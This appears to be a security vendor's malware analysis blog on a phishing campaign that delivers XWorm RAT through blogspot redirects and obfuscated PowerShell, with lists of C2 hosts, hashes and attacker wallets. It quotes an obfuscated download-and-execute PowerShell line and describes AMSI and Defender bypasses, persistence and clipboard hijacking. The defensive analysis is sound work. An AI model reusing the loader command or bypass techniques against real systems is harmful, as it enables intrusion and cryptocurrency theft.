Take a Product Tour Request a Demo Cybersecurity Assessment Contact Us

Blogs

The latest cybersecurity trends, best practices, security vulnerabilities, and more

Old Loader, New Threat: Exploring XWorm RAT's Distribution and Tactics

Executive Summary:

In March-April 2023, we detected a malicious email campaign delivering .Net based XWorm RAT in which embedded blogspot.com URLs were used as an entry point. This URL redirects to multilayer distribution with obfuscated PowerShell codes to deliver XWorm as the final payload, leveraging both “XWormV2.1” and “XWormV3.1” malware in this campaign.

One of the XWorm payloads involved the inclusion of hardcoded cryptocurrency coins within a file. The intention behind this was to hijack clipboard and replace legitimate cryptocurrency addresses with fraudulent ones, resulting in the theft of crypto coins from victims . During our analysis, we noticed the exact same crypto id was used in a 2021 campaign from AgentTesla, which suggests that the same threat actors are still active and running campaigns with different tools. The distribution mechanism is also reminiscent of past trends, with attackers abusing blogspot.com as the initial vector.

XWorm Seller’s Information:

Fig 1. XWorm and few other tools hosted for sale.
Fig 1. XWorm and few other tools hosted for sale.


Fig 2. Telegram group to provide latest updates on tools.
Fig 2. Telegram group to provide latest updates on tools.


Fig 3. Latest XWorm variants are sold on Shoppy instance.
Fig 3. Latest XWorm variants are sold on Shoppy instance.


Xcoders/Evilcoder are actively selling XWorm RAT’s various versions through digital marketplaces, and details can be found on their Telegram (XcoderGroup) channel. The latest variant of XWorm v4.1, v4.2 and v5.0 are being sold for $400.

Delivery Mechanism:

Fig 4.1 Delivery Mechanism
Fig 4.1 Delivery Mechanism

We found social engineering emails with pdf, docx and rtf attachments. The lure of emails was mostly themed around business interaction such as request for quote, invoice, or purchase orders. A deceived victim would open the attachment, click on the embedded URL, and launch the downloaded script.

The campaign used blogspot.com URLs pointing to scripts and PowerShell code to download and execute additional payloads as well as to establish persistence. Similar techniques were seen in past campaigns.

Analysis:

Figure 5 shows some of the emails that we observed in this campaign. Trellix Email Security was able to successfully detect this email campaign and safeguard users.

Fig 5.  Email samples we observed in this campaign
Fig 5. Email samples we observed in this campaign

Some PDF samples had fake alert screens with an error message and a "Reload" button. Clicking on the button leads the victim to the blogspot.com URL.

Fig 6. Fake alert prompt.
Fig 6. Fake alert prompt.

“hxxps://adobeupdate2023[.]blogspot[.]com/atom[.]xml”

The embedded blogspot.com URL redirected to a location that hosts an obfuscated JS/HTA/VBS file. Executing obfuscated file downloads and runs PowerShell code.

“hxxps://download2431.mediafire.com/o7khka7z7uxgxXFo9SrPO7wP0cQwlUtJopql7s PYu3y5km5nQCrqO0tfHsvP8gHpJy7pFWUtQVWCag6RRTAapOY9w/zfilcaiw6chd9hu/invoice-1588307354.pdf.js”

Observed delivery mechanism in analysed sample.

Fig 4.2 Delivery mechanism observed in analysed sample
Fig 4.2 Delivery mechanism observed in analysed sample


Fig 7. shows the content hosted on above URL
Fig 7. shows the content hosted on above URL.

The following PowerShell code gets executed from the JS:

PowerShell.exe -eP Bypass -c (I'w'r('hxxps://updatepower2023.blogspot.com/atom.xml') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex') | ping 127.0.0.1

Upon visiting URL via browser, we observed that the URL navigated to hosted text content, which has the PowerShell code.

hxxps://updatepower2023.blogspot.com/atom.xml redirected to following URL hxxps://529f38d0-3744-4286-b484be860d475d25[.]usrfiles[.]com/ugd/529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56[.]txt

Figure 8 shows the final PowerShell script in the chain:

Fig 8. Hosted PowerShell script over URL
Fig 8. Hosted PowerShell script over URL

Analysis of the PowerShell Script:

Fig 9. PowerShell Script wipes the traces and creates folder for persistence.
Fig 9. PowerShell Script wipes the traces and creates folder for persistence.

The PowerShell code begins by terminating the Word process and deleting DOC files from the Downloads and Desktop folders. It then creates the MEMEMAN folder to store its tools.

$NuclearDefusion code shown in Fig 10 is stored at, C:\\ProgramData\\MEMEMAN\\CypherDeptography.~+~, and is executed.

Fig 10. PowerShell code of $NuclearDefusion variable.
Fig 10. PowerShell code of $NuclearDefusion variable.

The variable $AMSISSISISI contains the obfuscated code to bypass AMSI protection and Windows defender by adding manual exclusions.

AMSI Bypass

Fig 11. AMSI Bypass
Fig 11. AMSI Bypass

The PowerShell script uses a well-known method to bypass AMSI protection by manually setting the “amsiInitFailed” flag.

Windows Defender Bypass

The code snippet below shows various exclusion settings for extensions, paths, and processes to avoid detection by Windows Defender. It also terminates and deletes Windows Defender services, creates a local administrator user named "system32," and grants it RDP access.

Fig 12. Windows defender path exclusion and user creation.
Fig 12. Windows defender path exclusion and user creation.

Persistence

In the Fig 10 code snippet of $NuclearDefusion, the code from variable $CHOTAbheem writes code to the file "C:\ProgramData\MEMEMAN\WINDOWSdefen.js" for persistence purposes. This code is designed to execute the PowerShell content of the file named "CypherDeptography.~+~" which was stored earlier. The "EscansUpdate" task is scheduled using the task scheduler to run WINDOWSdefen.js.

Fig 13. Code snippet schedules a Task
Fig 13. Code snippet schedules a Task

The code below contains a hex-encoded .Net loader that has been obfuscated with DeapSea 4.1. This loader injects the XWorm payload into various legitimate processes. This injection allows the XWorm to run within the context of those legitimate processes.

Fig 14. .Net loader DLL executes XWorm payload
Fig 14. .Net loader DLL executes XWorm payload


The code snippet above has a function called "gippler" that loads the .Net DLL to initiate the payload. To inject the content of the variable "$MEME2026" (which represents the executable for XWorm v3.1), the "A.B.C" method is invoked with the path of a legitimate executables listed below.

.Net loader DLL - D5887A373E8122365CBC546B13FADBD7

The argument content gets loaded into the below mentioned files respectively.

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
  2. C:\Windows\Microsoft.NET\Framework\v2.0.50727\Regsvcs.exe
  3. C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe

Process hollowing is used to load the XWorm payload.

Fig 15. DLL function used for XWorm execution.
Fig 15. DLL function used for XWorm execution.

The stored API names after the partial de-obfuscation of the DLL is as shown below.

Fig 16. API names after the partial de-obfuscation.
Fig 16. API names after the partial de-obfuscation.

After XWorm payload execution, the PowerShell code executes $KIMBERTOOL and $shakalakaboomboom variable content, which serves the purpose of decoding code that is stored in C:\ProgramData\MEMEMAN\REALENGINEUPDATE.js and UpdateEscan.js. This decoded code then downloads and runs content from a BlogSpot URL. The downloaded content repeats a series of actions, including stopping windefender services and AMSI, and ultimately delivers XWorm as end payload. It seems that this is for an additional layer of persistence.

Fig 17.PowerShell code creates persistence.
Fig 17.PowerShell code creates persistence.

Analysis of XWorm:

As mentioned earlier, the variable "$MEME2026" contains the payload for XWorm v3.1. This payload is heavily obfuscated, adding an extra layer of complexity to its analysis.

Fig 18. Hex coded XWorm payload in PowerShell code
Fig 18. Hex coded XWorm payload in PowerShell code


Fig 19. Basic characteristics of payload
Fig 19. Basic characteristics of payload

Upon execution, the malware sleeps for one second, and then attempts to create a mutex (“AEElwlFaEu3hAU65”). If the code fails to create a mutex, the malware terminates.

This code also checks for debuggers as shown below:

Fig 20. Anti Debugging Check
Fig 20. Anti Debugging Check

Resolving Encrypted Strings

The analysed XWorm payload has hardcoded base64 & AES encrypted strings that gets decrypted during execution. The strings includes host, port, encryption key, mutex name, and Bitcoin wallet addresses.

Fig 21. Code to resolve encrypted variables
Fig 21. Code to resolve encrypted variables


Fig 22. Decrypted variables
Fig 22. Decrypted variables

Keylogging function

The below code snippet highlights a keylogger functionality which extracts ts the keystrokes of the user. Furthermore, the XLogger module performs additional operations such as getting keyboard state, keyboard layout, and the active window.

Fig 23. Keylogging Functionality
Fig 23. Keylogging Functionality

Clipboard Hijacking

We have observed an instance of clipboard hijacking where a listener is created to monitor changes in the clipboard using the AddClipboardFormatListener() method. The GetText() and SetText() methods are used to retrieve and set the clipboard content, respectively. Clipboard content is matched against a set of regular expressions, shown below, to look for crypto currency wallet addresses. If an address is found, it is overwritten with one of the attacker-owned addresses.

Fig 24.1. Code to add clipboard listener
Fig 24.1. Code to add clipboard listener


Fig 24.2. Replace clipboard content with attacker’s wallet IDs
Fig 24.2. Replace clipboard content with attacker’s wallet IDs

Bitcoin, TRC20, and Ethereum wallet IDs are targeted and replaced with ones below:

BTC: 3CghDNiD2J5xsS9i1wzwbvwdTJxokqGCmC
ETH: 0x8af86e2c7126d08387e71ec6699bc69f957cdee6
TRC20: TEoYgXKbx5nKq3i6jB2KsHby93bWQuKi1C

During OSINT gathering, we came across information that suggests the use of the same Bitcoin (BTC) address in a previous campaign known as the “Aggah campaign” which surfaced around August 2021. The same Bitcoin (BTC) wallet address was observed in a similar campaign that utilized AgentTesla and AveMaria as payloads in Jan 2022. This finding implies that the threat actors involved in the previous campaign are still active and conducting attacks using new payloads. However, they continue to employ the same old BTC wallet ID to steal cryptocurrency coins, and this BTC wallet has recent transactions, as per blockchain explorers.

Fig 25. Transactions on observed BTC address
Fig 25. Transactions on observed BTC address

After clipboard hijacking, the code verifies the status of the victim's network. If the network is active, BeginConnect() method establishes a socket connection with the command-and-control (C2) server.

C2 Host: "updateccdata[.]duckdns.org", Port: 5002

Fig 26. BeginConnect() method creates socket connection for further communication
Fig 26. BeginConnect() method creates socket connection for further communication

After establishing a connection with the C2 server, the malicious code starts the ClientSocket.info () function to gather the system information of the target, which will be utilized for subsequent actions.

Fig 27. Collection of system information
Fig 27. Collection of system information

ClientSocket.info () retrieves information and returns an array containing the retrieved data.

Fig 28. Collected system information
Fig 28. Collected system information

ClientSocket.Send() encrypts the collected information with AES and sends it to the C2 server .

Fig 29. AES encryption of collected information.
Fig 29. AES encryption of collected information.

Upon sending the collected data, the code calls ClientSocket.BeginReceive() and waits for a response from the C2 server to perform further actions.

Fig 30. Call to BeginReceive function to get C2 response
Fig 30. Call to BeginReceive function to get C2 response

Upon successful response from the C2 server, the response is expected to be encrypted using AES in ECB mode. After decryption, the response is a sequence of words delimited by "<Xwormmm>", the first word is the command to execute. The remaining elements are the arguments.

Fig 31. Function to decode C2 response
Fig 31. Function to decode C2 response

Fig 32. C2 Commands
Fig 32. C2 Commands

Below is the list of C2 commands and their usage:

Command
Usage (C2 response has argument for the execution)
rec
Restarts application
CLOSE
Close the application
uninstall
Write and execute a batch file to remove current process executable from start-up folder and close the application.
update
Execute uninstall command functions and start a new process with executable code from a C2 argument.
DW
Write and execute PowerShell content received as an argument from C2.
FM
Invokes the content of argument memory stream into the current process.
LN
Download file from argument URL and execute it.
Urlopen
Create GET request for argument URL and open it with browser.
Urlhide
Create GET request for argument URL and open it within existing process.
PCShutdown
Execute shutdown command “shutdown.exe /f /s /t 0”
Delete_file: False
Audio_record_time: 5
PCRestart
Execute restart command “shutdown.exe /f /r /t 0”
PCLogoff
Execute logoff command “shutdown.exe -L”
StartDDos
Create thread to perform repeated POST request to the provided host and port. The function will repeat this action every 2.5 seconds until the specified time limit is reached. Host, port, and time limit are provided as arguments.
StopDDos
Stops DDos thread.
StartReport
Create thread to compare running processes title with provided list., If it matches, send message to C2.
StopReport
Stops StartReport thread.
Xchat / ngork
Send concatenated system hardware information related to C2 to provide further actions. OS name, username, drive info, processor info, etc.
DDos
Resend “DDos” message to C2. (Might be used to check active victims)
Plugin
Same as Plugin command, but decrypted argument file content is stored in registry. Registry key string is generated using system information.
OfflineGet
XWorm payload writes logs to log.tmp file. Content of this file is sent to C2 on this command execution.
$Cap
Takes screenshot and sends it to C2 as memory stream.
MessageBox
Display argument message from C2 as message box.

The "Plugin" command retrieves and loads content from the C2 response. It is expected as .NET compiled code with multiple methods. These method names are compared with various values, including "ENC" and "DEC". Based on information from the seller's web site, we believe that these methods may represent ransomware encryption and decryption.

Fig 33. Method name string comparison with ”ENC and DEC”.
Fig 33. Method name string comparison with ”ENC and DEC”.

Fig 34. Ransomware functionality from XWorm builder
Fig 34. Ransomware functionality from XWorm builder

Conclusion:

This blog took a deep dive into the XWorm malware campaign. We observed that XWorm RAT can steal crypto coins, and als o has the ability to carry out ransomware attacks. Malware is distributed using a multi-layered approach, utilizing legitimate websites and obfuscated PowerShell scripts. This distribution method has been previously seen in campaigns involving AgentTesla and RevengeRat , among others. These findings show that this malware campaign is sophisticated and persistent, highlighting the importance of strong security measures to protect against such threats.

Telemetry:

We observed that the United States, South Korea, and Germany were the primary countries where most of the detections were seen, as depicted in Figure 35. Also, service/consulting, transport, and healthcare sectors had the highest number of detections , as illustrated in Figure 36.

Fig 35. XWorm event detections by region
Fig 35. XWorm event detections by region

Fig 36. XWorm event detections by industry
Fig 36. XWorm event detections by industry

Trellix product coverage:

Network Security (NX)
Detection as a Service
Email Security
Malware Analysis
File Protect
FE_Trojan_MSIL_Generic_292
FEC_Exploit_OOXML_Generic_8
FE_Backdoor_MSIL_Generic_14
Trojan.XWorm
Suspicious Network By PowerShell
Suspicious Network Activity
Suspicious Process Launching Activity
Suspicious Process PowerShell Activity fe_ml_heuristic
Endpoint Security (HX)
Trojan.Agent.GFIT
Trojan.GenericKD.67803158
Gen:Variant.Marsilia.8687
Trojan.GenericKD.65526506
Trojan.JS.Agent.UTQ
Trojan.GenericKD.66156681
IL:Trojan.MSILZilla.25629
Trojan.GenericKD.65851153
Generic.mg.d0208a3ac5581e6b
Generic.mg.fb1fd4ace84756ed
Generic.mg.6ced4f98cd34cc2e
Endpoint Security (ENS)
Trojan-FVHU!B05C9ACBCEFE trojan !!! Trojan-FVHU!D5887A373E81 trojan !!! XWorm!6CED4F98CD34 trojan !!! XWorm!6CED4F98CD34 trojan !!! Trojan-FVHW!D0208A3AC558 trojan !!! JS/Agent.go trojan !!! W97M/Macroless.aa trojan !!! W97M/Macroless.aa trojan !!! PS/Downloader.ha trojan !!!

IOCs:

d7e4ac9db513592230624aab493aceb6acbbd3503b286ce64e6d808850fbaab7
0d90fde0cc738db8dbc06852a68e13820e7227ab10679ac1dceac13840e571f5
a5822895ccbd489703c94c24f6b4b41ce78cb9a39992e9df130932b07193f7d5
f515bb9186cc9e8b8aff3a4c65284493c7a3f703c9ff70c2c656bb5e0b95003d
dca74423e6e7b7ee5e696099549dacb4e1ffb9dccccd81e0ac1f7ce2b6be2003
f3e6621928875a322ee7230ccf186bdaa5609118c4a6d1c2f4026adfb8e88744
93e72f97f81af71808283cd10ab5b7ddf0038d232fb89956e8b5329c0c8797ba
9f255b6109a66d6db5b525dab165b6e5a59da6a26bcee6221bbc2bfa36829690
bf5ea8d5fd573abb86de0f27e64df194e7f9efbaadd5063dee8ff9c5c3baeaa2
3c45a698e45b8dbb1df206dec08c8792087619e54c0c9fc0f064bd9a47a84f16

Urls & C2:

updateccdata[.]duckdns[.]org
hxxps://adobeupdate2023[.]blogspot[.]com/atom[.]xml
hxxps://download2431[.]mediafire[.]com/o7khka7z7uxgxXFo9SrPO7wP0cQwlUtJopql7s PYu3y5km5nQCrqO0tfHsvP8gHpJy7pFWUtQVWCag6RRTAapOY9w/zfilcaiw6chd9hu/invoice-1588307354[.]pdf[.]js
hxxps://updatepower2023[.]blogspot[.]com/atom[.]xml
hxxps://529f38d0-3744-4286-b484be860d475d25[.]usrfiles[.]com/ugd/529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56[.]txt
stanthely2023[.]duckdns[.]org
port3000newspm[.]duckdns[.]org
zenova[.]duckdns[.]org
hxxps://urlintimacygoombguch[.]blogspot[.]com/atom[.]xml
hxxps://powpowpowff[.]blogspot[.]com/atom[.]xml
hxxps://adobeacrobateupdate2023[.]blogspot[.]com/atom[.]xml
hxxps://abodeupdatenew[.]blogspot[.]com/atom[.]xml
hxxps://updatingmsoffice[.]blogspot[.]com/atom[.]xml
hxxps://huskidkifklaoksikfkfijsju[.]blogspot[.]com/atom[.]xml
hxxps://a[.]pomf[.]cat/kfbahy[.]hta
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f[.]usrfiles[.]com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093[.]docx
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f[.]usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482[.]txt

Wallet IDs:

BTC: 3CghDNiD2J5xsS9i1wzwbvwdTJxokqGCmC
ETH: 0x8af86e2c7126d08387e71ec6699bc69f957cdee6
TRC20: TEoYgXKbx5nKq3i6jB2KsHby93bWQuKi1C
This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers.

RECENT STORIES

Get the latest cybersecurity insights from our LinkedIn Digest. Subscribe on LinkedIn

Get the latest

We’re no strangers to cybersecurity. But we are a new company.
Stay up to date as we evolve.

Please enter a valid email address.

Zero spam. Unsubscribe at any time.